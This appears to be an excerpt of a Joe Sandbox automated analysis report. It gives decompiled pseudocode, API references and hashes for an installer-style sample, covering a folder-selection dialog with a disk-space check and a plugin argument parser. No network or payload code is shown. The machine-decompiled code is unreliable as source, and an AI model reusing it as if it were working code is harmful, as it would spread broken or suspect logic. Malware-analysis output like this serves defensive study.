                                                  				_t3 = GlobalAlloc(0x40,  *0x7320506c +  *0x7320506c); // executed
                                                  				return _t3;
                                                  			}




                                                  0x732012c5
                                                  0x732012cb

                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,732012DB,?,7320137F,00000019,732011CA,-000000A0), ref: 732012C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: 4a97046ac53dd2d9ad122c5b9bff488b74d28016beb494c009742f16b2783ab6
                                                  • Instruction ID: 9a7bcdf2f857ac48a68c1e280b6a8af46715d16bc7e09c693f7521956db6a9c0
                                                  • Opcode Fuzzy Hash: 4a97046ac53dd2d9ad122c5b9bff488b74d28016beb494c009742f16b2783ab6
                                                  • Instruction Fuzzy Hash: DDB012B2A04010DFFE00AB65CF0EF3C3295E704309F24D000FA08D0180C1204C089934
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				long _v16;
                                                  				long _v20;
                                                  				long _v24;
                                                  				char _v28;
                                                  				intOrPtr _v32;
                                                  				long _v36;
                                                  				char _v40;
                                                  				unsigned int _v44;
                                                  				signed int _v48;
                                                  				WCHAR* _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				WCHAR* _v72;
                                                  				void _v76;
                                                  				struct HWND__* _v80;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t82;
                                                  				long _t87;
                                                  				short* _t89;
                                                  				void* _t95;
                                                  				signed int _t96;
                                                  				int _t109;
                                                  				signed short _t114;
                                                  				signed int _t118;
                                                  				struct HWND__** _t122;
                                                  				intOrPtr* _t138;
                                                  				WCHAR* _t146;
                                                  				unsigned int _t150;
                                                  				signed int _t152;
                                                  				unsigned int _t156;
                                                  				signed int _t158;
                                                  				signed int* _t159;
                                                  				signed int* _t160;
                                                  				struct HWND__* _t166;
                                                  				struct HWND__* _t167;
                                                  				int _t169;
                                                  				unsigned int _t197;
                                                  
                                                  				_t156 = __edx;
                                                  				_t82 =  *0x42c240; // 0x7690e4
                                                  				_v32 = _t82;
                                                  				_t2 = _t82 + 0x3c; // 0x0
                                                  				_t3 = _t82 + 0x38; // 0x0
                                                  				_t146 = ( *_t2 << 0xb) + 0x436000;
                                                  				_v12 =  *_t3;
                                                  				if(_a8 == 0x40b) {
                                                  					E00405B81(0x3fb, _t146);
                                                  					E004067C4(_t146);
                                                  				}
                                                  				_t167 = _a4;
                                                  				if(_a8 != 0x110) {
                                                  					L8:
                                                  					if(_a8 != 0x111) {
                                                  						L20:
                                                  						if(_a8 == 0x40f) {
                                                  							L22:
                                                  							_v8 = _v8 & 0x00000000;
                                                  							_v12 = _v12 & 0x00000000;
                                                  							E00405B81(0x3fb, _t146);
                                                  							if(E00405F14(_t186, _t146) == 0) {
                                                  								_v8 = 1;
                                                  							}
                                                  							E0040653D(0x42b238, _t146);
                                                  							_t87 = E0040690A(1);
                                                  							_v16 = _t87;
                                                  							if(_t87 == 0) {
                                                  								L30:
                                                  								E0040653D(0x42b238, _t146);
                                                  								_t89 = E00405EB7(0x42b238);
                                                  								_t158 = 0;
                                                  								if(_t89 != 0) {
                                                  									 *_t89 = 0;
                                                  								}
                                                  								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                  									goto L35;
                                                  								} else {
                                                  									_t169 = 0x400;
                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                  									asm("cdq");
                                                  									_v48 = _t109;
                                                  									_v44 = _t156;
                                                  									_v12 = 1;
                                                  									goto L36;
                                                  								}
                                                  							} else {
                                                  								_t159 = 0;
                                                  								if(0 == 0x42b238) {
                                                  									goto L30;
                                                  								} else {
                                                  									goto L26;
                                                  								}
                                                  								while(1) {
                                                  									L26:
                                                  									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                  									if(_t114 != 0) {
                                                  										break;
                                                  									}
                                                  									if(_t159 != 0) {
                                                  										 *_t159 =  *_t159 & _t114;
                                                  									}
                                                  									_t160 = E00405E58(0x42b238);
                                                  									 *_t160 =  *_t160 & 0x00000000;
                                                  									_t159 = _t160;
                                                  									 *_t159 = 0x5c;
                                                  									if(_t159 != 0x42b238) {
                                                  										continue;
                                                  									} else {
                                                  										goto L30;
                                                  									}
                                                  								}
                                                  								_t150 = _v44;
                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                  								_v44 = _t150 >> 0xa;
                                                  								_v12 = 1;
                                                  								_t158 = 0;
                                                  								__eflags = 0;
                                                  								L35:
                                                  								_t169 = 0x400;
                                                  								L36:
                                                  								_t95 = E00404E27(5);
                                                  								if(_v12 != _t158) {
                                                  									_t197 = _v44;
                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                  										_v8 = 2;
                                                  									}
                                                  								}
                                                  								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                  									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                  									if(_v12 == _t158) {
                                                  										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                  									} else {
                                                  										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                  									}
                                                  								}
                                                  								_t96 = _v8;
                                                  								 *0x434fa4 = _t96;
                                                  								if(_t96 == _t158) {
                                                  									_v8 = E0040140B(7);
                                                  								}
                                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                  									_v8 = _t158;
                                                  								}
                                                  								E004044BB(0 | _v8 == _t158);
                                                  								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                  									E004048E3();
                                                  								}
                                                  								 *0x42d258 = _t158;
                                                  								goto L53;
                                                  							}
                                                  						}
                                                  						_t186 = _a8 - 0x405;
                                                  						if(_a8 != 0x405) {
                                                  							goto L53;
                                                  						}
                                                  						goto L22;
                                                  					}
                                                  					_t118 = _a12 & 0x0000ffff;
                                                  					if(_t118 != 0x3fb) {
                                                  						L12:
                                                  						if(_t118 == 0x3e9) {
                                                  							_t152 = 7;
                                                  							memset( &_v76, 0, _t152 << 2);
                                                  							_v80 = _t167;
                                                  							_v72 = 0x42d268;
                                                  							_v60 = E00404CE0;
                                                  							_v56 = _t146;
                                                  							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                  							_t122 =  &_v80;
                                                  							_v64 = 0x41;
                                                  							__imp__SHBrowseForFolderW(_t122);
                                                  							if(_t122 == 0) {
                                                  								_a8 = 0x40f;
                                                  							} else {
                                                  								__imp__CoTaskMemFree(_t122);
                                                  								E00405E0C(_t146);
                                                  								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                  								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\alfons\\AppData\\Local\\Temp") {
                                                  									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                  									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                  										lstrcatW(_t146, 0x432ea0);
                                                  									}
                                                  								}
                                                  								 *0x42d258 =  *0x42d258 + 1;
                                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                  							}
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					if(_a12 >> 0x10 != 0x300) {
                                                  						goto L53;
                                                  					}
                                                  					_a8 = 0x40f;
                                                  					goto L12;
                                                  				} else {
                                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                                  					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                  						E00405E0C(_t146);
                                                  					}
                                                  					 *0x433ed8 = _t167;
                                                  					SetWindowTextW(_t166, _t146);
                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                  					_push(1);
                                                  					E00404499(_t167);
                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  					_push(0x14);
                                                  					E00404499(_t167);
                                                  					E004044CE(_t166);
                                                  					_t138 = E0040690A(8);
                                                  					if(_t138 == 0) {
                                                  						L53:
                                                  						return E00404500(_a8, _a12, _a16);
                                                  					} else {
                                                  						 *_t138(_t166, 1);
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  			}













































                                                  0x0040498a
                                                  0x00404990
                                                  0x00404996
                                                  0x0040499a
                                                  0x0040499d
                                                  0x004049a3
                                                  0x004049b1
                                                  0x004049b4
                                                  0x004049bc
                                                  0x004049c2
                                                  0x004049c2
                                                  0x004049ce
                                                  0x004049d1
                                                  0x00404a3f
                                                  0x00404a46
                                                  0x00404b1d
                                                  0x00404b24
                                                  0x00404b33
                                                  0x00404b33
                                                  0x00404b37
                                                  0x00404b41
                                                  0x00404b4e
                                                  0x00404b50
                                                  0x00404b50
                                                  0x00404b5e
                                                  0x00404b65
                                                  0x00404b6c
                                                  0x00404b6f
                                                  0x00404bab
                                                  0x00404bad
                                                  0x00404bb3
                                                  0x00404bb8
                                                  0x00404bbc
                                                  0x00404bbe
                                                  0x00404bbe
                                                  0x00404bda
                                                  0x00000000
                                                  0x00404bdc
                                                  0x00404bdf
                                                  0x00404bed
                                                  0x00404bf3
                                                  0x00404bf4
                                                  0x00404bf7
                                                  0x00404bfa
                                                  0x00000000
                                                  0x00404bfa
                                                  0x00404b71
                                                  0x00404b73
                                                  0x00404b77
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b79
                                                  0x00404b79
                                                  0x00404b86
                                                  0x00404b8b
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b8f
                                                  0x00404b91
                                                  0x00404b91
                                                  0x00404b9a
                                                  0x00404b9c
                                                  0x00404ba1
                                                  0x00404ba4
                                                  0x00404ba9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ba9
                                                  0x00404c06
                                                  0x00404c10
                                                  0x00404c13
                                                  0x00404c16
                                                  0x00404c1d
                                                  0x00404c1d
                                                  0x00404c1f
                                                  0x00404c1f
                                                  0x00404c24
                                                  0x00404c26
                                                  0x00404c2e
                                                  0x00404c35
                                                  0x00404c37
                                                  0x00404c42
                                                  0x00404c42
                                                  0x00404c37
                                                  0x00404c52
                                                  0x00404c5c
                                                  0x00404c64
                                                  0x00404c7f
                                                  0x00404c66
                                                  0x00404c6f
                                                  0x00404c6f
                                                  0x00404c64
                                                  0x00404c84
                                                  0x00404c89
                                                  0x00404c8e
                                                  0x00404c97
                                                  0x00404c97
                                                  0x00404ca0
                                                  0x00404ca2
                                                  0x00404ca2
                                                  0x00404cae
                                                  0x00404cb6
                                                  0x00404cc0
                                                  0x00404cc0
                                                  0x00404cc5
                                                  0x00000000
                                                  0x00404cc5
                                                  0x00404b6f
                                                  0x00404b26
                                                  0x00404b2d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b2d
                                                  0x00404a4c
                                                  0x00404a55
                                                  0x00404a6f
                                                  0x00404a74
                                                  0x00404a7e
                                                  0x00404a85
                                                  0x00404a91
                                                  0x00404a94
                                                  0x00404a97
                                                  0x00404a9e
                                                  0x00404aa6
                                                  0x00404aa9
                                                  0x00404aad
                                                  0x00404ab4
                                                  0x00404abc
                                                  0x00404b16
                                                  0x00404abe
                                                  0x00404abf
                                                  0x00404ac6
                                                  0x00404ad0
                                                  0x00404ad8
                                                  0x00404ae5
                                                  0x00404af9
                                                  0x00404afd
                                                  0x00404afd
                                                  0x00404af9
                                                  0x00404b02
                                                  0x00404b0f
                                                  0x00404b0f
                                                  0x00404abc
                                                  0x00000000
                                                  0x00404a74
                                                  0x00404a62
                                                  0x00000000
                                                  0x00000000
                                                  0x00404a68
                                                  0x00000000
                                                  0x004049d3
                                                  0x004049e0
                                                  0x004049e9
                                                  0x004049f6
                                                  0x004049f6
                                                  0x004049fd
                                                  0x00404a03
                                                  0x00404a0c
                                                  0x00404a0f
                                                  0x00404a12
                                                  0x00404a1a
                                                  0x00404a1d
                                                  0x00404a20
                                                  0x00404a26
                                                  0x00404a2d
                                                  0x00404a34
                                                  0x00404ccb
                                                  0x00404cdd
                                                  0x00404a3a
                                                  0x00404a3d
                                                  0x00000000
                                                  0x00404a3d
                                                  0x00404a34

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004049D9
                                                  • SetWindowTextW.USER32(00000000,-00436000), ref: 00404A03
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
                                                  • lstrcatW.KERNEL32(-00436000,Call), ref: 00404AFD
                                                  • SetDlgItemTextW.USER32 ref: 00404B0F
                                                    • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7519FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,7519FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                    • Part of subcall function 004067C4: CharPrevW.USER32(?,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                    • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                    • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                    • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                  • API String ID: 2624150263-2175137099
                                                  • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                  • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                  • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                  • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E73201BFF() {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				WCHAR* _v24;
                                                  				WCHAR* _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				WCHAR* _v48;
                                                  				signed int _v52;
                                                  				void* _v56;
                                                  				intOrPtr _v60;
                                                  				WCHAR* _t208;
                                                  				signed int _t211;
                                                  				void* _t213;
                                                  				void* _t215;
                                                  				WCHAR* _t217;
                                                  				void* _t225;
                                                  				struct HINSTANCE__* _t226;
                                                  				struct HINSTANCE__* _t227;
                                                  				struct HINSTANCE__* _t229;
                                                  				signed short _t231;
                                                  				struct HINSTANCE__* _t234;
                                                  				struct HINSTANCE__* _t236;
                                                  				void* _t237;
                                                  				intOrPtr* _t238;
                                                  				void* _t249;
                                                  				signed char _t250;
                                                  				signed int _t251;
                                                  				struct HINSTANCE__* _t257;
                                                  				void* _t258;
                                                  				signed int _t260;
                                                  				signed int _t261;
                                                  				signed short* _t264;
                                                  				signed int _t269;
                                                  				signed int _t272;
                                                  				signed int _t274;
                                                  				void* _t277;
                                                  				void* _t281;
                                                  				struct HINSTANCE__* _t283;
                                                  				signed int _t286;
                                                  				void _t287;
                                                  				signed int _t288;
                                                  				signed int _t300;
                                                  				signed int _t301;
                                                  				signed short _t304;
                                                  				void* _t305;
                                                  				signed int _t309;
                                                  				signed int _t312;
                                                  				signed int _t315;
                                                  				signed int _t316;
                                                  				signed int _t317;
                                                  				signed short* _t321;
                                                  				WCHAR* _t322;
                                                  				WCHAR* _t324;
                                                  				WCHAR* _t325;
                                                  				struct HINSTANCE__* _t326;
                                                  				void* _t328;
                                                  				signed int _t331;
                                                  				void* _t332;
                                                  
                                                  				_t283 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				_v40 = 0;
                                                  				_t332 = 0;
                                                  				_v52 = 0;
                                                  				_v44 = 0;
                                                  				_t208 = E732012BB();
                                                  				_v24 = _t208;
                                                  				_v28 = _t208;
                                                  				_v48 = E732012BB();
                                                  				_t321 = E732012E3();
                                                  				_v56 = _t321;
                                                  				_v12 = _t321;
                                                  				while(1) {
                                                  					_t211 = _v32;
                                                  					_v60 = _t211;
                                                  					if(_t211 != _t283 && _t332 == _t283) {
                                                  						break;
                                                  					}
                                                  					_t286 =  *_t321 & 0x0000ffff;
                                                  					_t213 = _t286 - _t283;
                                                  					if(_t213 == 0) {
                                                  						_t37 =  &_v32;
                                                  						 *_t37 = _v32 | 0xffffffff;
                                                  						__eflags =  *_t37;
                                                  						L20:
                                                  						_t215 = _v60 - _t283;
                                                  						if(_t215 == 0) {
                                                  							__eflags = _t332 - _t283;
                                                  							 *_v28 = _t283;
                                                  							if(_t332 == _t283) {
                                                  								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                  								 *(_t332 + 0x1010) = _t283;
                                                  								 *(_t332 + 0x1014) = _t283;
                                                  							}
                                                  							_t287 = _v36;
                                                  							_t47 = _t332 + 8; // 0x8
                                                  							_t217 = _t47;
                                                  							_t48 = _t332 + 0x808; // 0x808
                                                  							_t322 = _t48;
                                                  							 *_t332 = _t287;
                                                  							_t288 = _t287 - _t283;
                                                  							__eflags = _t288;
                                                  							 *_t217 = _t283;
                                                  							 *_t322 = _t283;
                                                  							 *(_t332 + 0x1008) = _t283;
                                                  							 *(_t332 + 0x100c) = _t283;
                                                  							 *(_t332 + 4) = _t283;
                                                  							if(_t288 == 0) {
                                                  								__eflags = _v28 - _v24;
                                                  								if(_v28 == _v24) {
                                                  									goto L42;
                                                  								}
                                                  								_t328 = 0;
                                                  								GlobalFree(_t332);
                                                  								_t332 = E732013B1(_v24);
                                                  								__eflags = _t332 - _t283;
                                                  								if(_t332 == _t283) {
                                                  									goto L42;
                                                  								} else {
                                                  									goto L35;
                                                  								}
                                                  								while(1) {
                                                  									L35:
                                                  									_t249 =  *(_t332 + 0x1ca0);
                                                  									__eflags = _t249 - _t283;
                                                  									if(_t249 == _t283) {
                                                  										break;
                                                  									}
                                                  									_t328 = _t332;
                                                  									_t332 = _t249;
                                                  									__eflags = _t332 - _t283;
                                                  									if(_t332 != _t283) {
                                                  										continue;
                                                  									}
                                                  									break;
                                                  								}
                                                  								__eflags = _t328 - _t283;
                                                  								if(_t328 != _t283) {
                                                  									 *(_t328 + 0x1ca0) = _t283;
                                                  								}
                                                  								_t250 =  *(_t332 + 0x1010);
                                                  								__eflags = _t250 & 0x00000008;
                                                  								if((_t250 & 0x00000008) == 0) {
                                                  									_t251 = _t250 | 0x00000002;
                                                  									__eflags = _t251;
                                                  									 *(_t332 + 0x1010) = _t251;
                                                  								} else {
                                                  									_t332 = E7320162F(_t332);
                                                  									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                  								}
                                                  								goto L42;
                                                  							} else {
                                                  								_t300 = _t288 - 1;
                                                  								__eflags = _t300;
                                                  								if(_t300 == 0) {
                                                  									L31:
                                                  									lstrcpyW(_t217, _v48);
                                                  									L32:
                                                  									lstrcpyW(_t322, _v24);
                                                  									goto L42;
                                                  								}
                                                  								_t301 = _t300 - 1;
                                                  								__eflags = _t301;
                                                  								if(_t301 == 0) {
                                                  									goto L32;
                                                  								}
                                                  								__eflags = _t301 != 1;
                                                  								if(_t301 != 1) {
                                                  									goto L42;
                                                  								}
                                                  								goto L31;
                                                  							}
                                                  						} else {
                                                  							if(_t215 == 1) {
                                                  								_t257 = _v16;
                                                  								if(_v40 == _t283) {
                                                  									_t257 = _t257 - 1;
                                                  								}
                                                  								 *(_t332 + 0x1014) = _t257;
                                                  							}
                                                  							L42:
                                                  							_v12 = _v12 + 2;
                                                  							_v28 = _v24;
                                                  							L59:
                                                  							if(_v32 != 0xffffffff) {
                                                  								_t321 = _v12;
                                                  								continue;
                                                  							}
                                                  							break;
                                                  						}
                                                  					}
                                                  					_t258 = _t213 - 0x23;
                                                  					if(_t258 == 0) {
                                                  						__eflags = _t321 - _v56;
                                                  						if(_t321 <= _v56) {
                                                  							L17:
                                                  							__eflags = _v44 - _t283;
                                                  							if(_v44 != _t283) {
                                                  								L43:
                                                  								_t260 = _v32 - _t283;
                                                  								__eflags = _t260;
                                                  								if(_t260 == 0) {
                                                  									_t261 = _t286;
                                                  									while(1) {
                                                  										__eflags = _t261 - 0x22;
                                                  										if(_t261 != 0x22) {
                                                  											break;
                                                  										}
                                                  										_t321 =  &(_t321[1]);
                                                  										__eflags = _v44 - _t283;
                                                  										_v12 = _t321;
                                                  										if(_v44 == _t283) {
                                                  											_v44 = 1;
                                                  											L162:
                                                  											_v28 =  &(_v28[0]);
                                                  											 *_v28 =  *_t321;
                                                  											L58:
                                                  											_t331 =  &(_t321[1]);
                                                  											__eflags = _t331;
                                                  											_v12 = _t331;
                                                  											goto L59;
                                                  										}
                                                  										_t261 =  *_t321 & 0x0000ffff;
                                                  										_v44 = _t283;
                                                  									}
                                                  									__eflags = _t261 - 0x2a;
                                                  									if(_t261 == 0x2a) {
                                                  										_v36 = 2;
                                                  										L57:
                                                  										_t321 = _v12;
                                                  										_v28 = _v24;
                                                  										_t283 = 0;
                                                  										__eflags = 0;
                                                  										goto L58;
                                                  									}
                                                  									__eflags = _t261 - 0x2d;
                                                  									if(_t261 == 0x2d) {
                                                  										L151:
                                                  										_t304 =  *_t321;
                                                  										__eflags = _t304 - 0x2d;
                                                  										if(_t304 != 0x2d) {
                                                  											L154:
                                                  											_t264 =  &(_t321[1]);
                                                  											__eflags =  *_t264 - 0x3a;
                                                  											if( *_t264 != 0x3a) {
                                                  												goto L162;
                                                  											}
                                                  											__eflags = _t304 - 0x2d;
                                                  											if(_t304 == 0x2d) {
                                                  												goto L162;
                                                  											}
                                                  											_v36 = 1;
                                                  											L157:
                                                  											_v12 = _t264;
                                                  											__eflags = _v28 - _v24;
                                                  											if(_v28 <= _v24) {
                                                  												 *_v48 = _t283;
                                                  											} else {
                                                  												 *_v28 = _t283;
                                                  												lstrcpyW(_v48, _v24);
                                                  											}
                                                  											goto L57;
                                                  										}
                                                  										_t264 =  &(_t321[1]);
                                                  										__eflags =  *_t264 - 0x3e;
                                                  										if( *_t264 != 0x3e) {
                                                  											goto L154;
                                                  										}
                                                  										_v36 = 3;
                                                  										goto L157;
                                                  									}
                                                  									__eflags = _t261 - 0x3a;
                                                  									if(_t261 != 0x3a) {
                                                  										goto L162;
                                                  									}
                                                  									goto L151;
                                                  								}
                                                  								_t269 = _t260 - 1;
                                                  								__eflags = _t269;
                                                  								if(_t269 == 0) {
                                                  									L80:
                                                  									_t305 = _t286 + 0xffffffde;
                                                  									__eflags = _t305 - 0x55;
                                                  									if(_t305 > 0x55) {
                                                  										goto L57;
                                                  									}
                                                  									switch( *((intOrPtr*)(( *(_t305 + 0x732023e8) & 0x000000ff) * 4 +  &M7320235C))) {
                                                  										case 0:
                                                  											__ecx = _v24;
                                                  											__edi = _v12;
                                                  											while(1) {
                                                  												__edi = __edi + 1;
                                                  												__edi = __edi + 1;
                                                  												_v12 = __edi;
                                                  												__ax =  *__edi;
                                                  												__eflags = __ax - __dx;
                                                  												if(__ax != __dx) {
                                                  													goto L132;
                                                  												}
                                                  												L131:
                                                  												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                  												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                  													L136:
                                                  													 *__ecx =  *__ecx & 0x00000000;
                                                  													__eax = E732012CC(_v24);
                                                  													__ebx = __eax;
                                                  													goto L97;
                                                  												}
                                                  												L132:
                                                  												__eflags = __ax;
                                                  												if(__ax == 0) {
                                                  													goto L136;
                                                  												}
                                                  												__eflags = __ax - __dx;
                                                  												if(__ax == __dx) {
                                                  													__edi = __edi + 1;
                                                  													__edi = __edi + 1;
                                                  													__eflags = __edi;
                                                  												}
                                                  												__ax =  *__edi;
                                                  												 *__ecx =  *__edi;
                                                  												__ecx = __ecx + 1;
                                                  												__ecx = __ecx + 1;
                                                  												__edi = __edi + 1;
                                                  												__edi = __edi + 1;
                                                  												_v12 = __edi;
                                                  												__ax =  *__edi;
                                                  												__eflags = __ax - __dx;
                                                  												if(__ax != __dx) {
                                                  													goto L132;
                                                  												}
                                                  												goto L131;
                                                  											}
                                                  										case 1:
                                                  											_v8 = 1;
                                                  											goto L57;
                                                  										case 2:
                                                  											_v8 = _v8 | 0xffffffff;
                                                  											goto L57;
                                                  										case 3:
                                                  											_v8 = _v8 & 0x00000000;
                                                  											_v20 = _v20 & 0x00000000;
                                                  											_v16 = _v16 + 1;
                                                  											goto L85;
                                                  										case 4:
                                                  											__eflags = _v20;
                                                  											if(_v20 != 0) {
                                                  												goto L57;
                                                  											}
                                                  											_v12 = _v12 - 2;
                                                  											__ebx = E732012BB();
                                                  											 &_v12 = E73201B86( &_v12);
                                                  											__eax = E73201510(__edx, __eax, __edx, __ebx);
                                                  											goto L97;
                                                  										case 5:
                                                  											L105:
                                                  											_v20 = _v20 + 1;
                                                  											goto L57;
                                                  										case 6:
                                                  											_push(7);
                                                  											goto L123;
                                                  										case 7:
                                                  											_push(0x19);
                                                  											goto L143;
                                                  										case 8:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L107;
                                                  										case 9:
                                                  											_push(0x15);
                                                  											goto L143;
                                                  										case 0xa:
                                                  											_push(0x16);
                                                  											goto L143;
                                                  										case 0xb:
                                                  											_push(0x18);
                                                  											goto L143;
                                                  										case 0xc:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L118;
                                                  										case 0xd:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L109;
                                                  										case 0xe:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L111;
                                                  										case 0xf:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L122;
                                                  										case 0x10:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L113;
                                                  										case 0x11:
                                                  											_push(3);
                                                  											goto L123;
                                                  										case 0x12:
                                                  											_push(0x17);
                                                  											L143:
                                                  											_pop(__ebx);
                                                  											goto L98;
                                                  										case 0x13:
                                                  											__eax =  &_v12;
                                                  											__eax = E73201B86( &_v12);
                                                  											__ebx = __eax;
                                                  											__ebx = __eax + 1;
